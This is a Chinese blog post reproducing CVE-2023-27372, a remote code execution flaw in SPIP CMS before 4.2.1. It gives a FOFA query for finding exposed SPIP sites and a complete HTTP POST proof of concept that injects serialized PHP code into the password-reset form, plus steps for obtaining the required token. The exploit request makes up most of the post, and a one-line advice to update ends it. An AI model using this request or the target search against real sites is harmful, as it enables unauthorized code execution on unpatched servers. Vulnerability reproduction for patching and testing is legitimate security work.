【漏洞复现】CVE-2023-27372 RCE漏洞

产品介绍

SPIP是一个互联网发布系统,其中非常重视协作工作,多语言环境和Web作者的易用性。它是自由软件,在GNU/GPL许可证下分发。这意味着它可以用于任何互联网站点,无论是个人的还是机构的,非营利的还是商业的。

漏洞概述

SPIP Cms v4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤,从而触发命令执行漏洞。

影响版本


SPIP < 4.2.1

复现环境

靶场下载:spip V4.0.8

FOFA:app="SPIP"

漏洞复现

POC:

POST /spip/spip.php?page=spip_pass HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: cibcInit=oui
Content-Length: 215
Content-Type: application/x-www-form-urlencoded

page=spip_pass&formulaire_action=oubli&formulaire_action_args=JWFEz0e3UDloiG3zKNtcjKCjPLtvQ3Ec0vfRTgIG7u7L0csbb259X%2Buk1lEX5F3%2F09Cb1W8MzTye1Q%3D%3D&oubli=s:19:"<?php phpinfo(); ?>";&nobot=

其中 formulaire_action_args 参数需访问路径:/spip.php?page=spip_pass 获取,标签为:input,name为:formulaire_action_args

EXP:

修复建议

建议及时更新至最新版本。

posted @ 2023-07-13 15:54  spmonkey  阅读(1523)  评论(0编辑  收藏  举报